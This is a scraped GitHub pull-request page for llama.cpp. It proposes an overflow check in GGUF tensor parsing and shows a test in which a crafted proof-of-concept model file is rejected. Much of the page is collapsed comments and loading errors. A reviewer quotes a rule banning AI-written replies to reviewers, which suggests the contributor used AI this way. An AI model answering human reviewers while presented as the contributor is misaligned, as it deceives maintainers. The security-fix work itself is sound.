+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

Do you want me to test the PR patch? It seems unnecessarily larger.

(root|~/A) ./test_exploit.sh
[*] Testing with ASAN build...
main: build = 7749 (a75fd08e7)
main: built with GNU 12.2.0 for Linux x86_64
main: quantizing '/root/A/overflow_poc_friday.gguf' to '/tmp/out.gguf' as Q4_0
gguf_init_from_file_impl: tensor 'token_embd.weight' size overflow
gguf_init_from_file_impl: failed to read tensor info
llama_model_quantize: failed to quantize: llama_model_loader: failed to load model from /root/A/overflow_poc_friday.gguf
main: failed to quantize model from '/root/A/overflow_poc_friday.gguf'
[*] Exit code: 1

JohannesGaessler · 2026-01-10T09:26:56Z

ggml_nbytes_safe should not be in the core library, I've already laid out how the fix should be done and this has not changed. And just in case you're unaware, let me remind you of this rule from the contributing guidelines:

Using AI to respond to human reviewers is strictly prohibited.

alexanderkent requested review from JohannesGaessler and ggerganov as code owners January 7, 2026 18:42

loci-dev mentioned this pull request Jan 7, 2026

UPSTREAM PR #18674: Fix integer overflow in GGUF tensor parsing auroralabs-loci/llama.cpp#844

Open

github-actions Bot added the ggml changes relating to the ggml tensor library for machine learning label Jan 7, 2026

JohannesGaessler reviewed Jan 7, 2026

View reviewed changes

Simplify fix: rely on ggml_nbytes_safe for overflow detection

5d00789

Removed redundant inline overflow checks from stride calculations. The ggml_nbytes_safe() call before allocation handles all overflow scenarios, making the earlier checks unnecessary.

ngxson closed this Jan 9, 2026

JohannesGaessler mentioned this pull request Jan 24, 2026

GGUF: check that tensor size is representable #19072

Merged

loci-dev mentioned this pull request Jan 24, 2026

UPSTREAM PR #19072: GGUF: check that tensor size is representable auroralabs-loci/llama.cpp#1022

Open

Conversation

alexanderkent commented Jan 7, 2026

Uh oh!

JohannesGaessler commented Jan 7, 2026

Uh oh!

ServeurpersoCom commented Jan 7, 2026

Uh oh!

JohannesGaessler left a comment

Choose a reason for hiding this comment

Uh oh!

ServeurpersoCom commented Jan 7, 2026 • edited by JohannesGaessler Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

ServeurpersoCom commented Jan 7, 2026

Uh oh!

ServeurpersoCom commented Jan 7, 2026 • edited by JohannesGaessler Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

JohannesGaessler commented Jan 7, 2026

Uh oh!

ServeurpersoCom commented Jan 7, 2026

Uh oh!

ServeurpersoCom commented Jan 7, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

has offset 320868864, expected 5383208929597152

Uh oh!

ServeurpersoCom commented Jan 7, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

ServeurpersoCom commented Jan 7, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

ngxson commented Jan 8, 2026

Uh oh!

alexanderkent commented Jan 8, 2026

Uh oh!

ServeurpersoCom commented Jan 8, 2026

Uh oh!

alexanderkent commented Jan 8, 2026

Uh oh!

ServeurpersoCom commented Jan 8, 2026

Uh oh!

ServeurpersoCom commented Jan 8, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

ServeurpersoCom commented Jan 8, 2026

Uh oh!

ngxson commented Jan 8, 2026

Uh oh!

ngxson commented Jan 9, 2026

Uh oh!

JohannesGaessler commented Jan 9, 2026

Uh oh!

alexanderkent commented Jan 10, 2026

Reproduction with llama-quantize (production tool)

Potential Root Cause

Uh oh!

ServeurpersoCom commented Jan 10, 2026

Uh oh!

JohannesGaessler commented Jan 10, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

ServeurpersoCom commented Jan 7, 2026 •

edited by JohannesGaessler

Loading

ServeurpersoCom commented Jan 7, 2026 •

edited by JohannesGaessler

Loading

ServeurpersoCom commented Jan 7, 2026 •

edited

Loading

ServeurpersoCom commented Jan 7, 2026 •

edited

Loading

ServeurpersoCom commented Jan 7, 2026 •

edited

Loading

ServeurpersoCom commented Jan 8, 2026 •

edited

Loading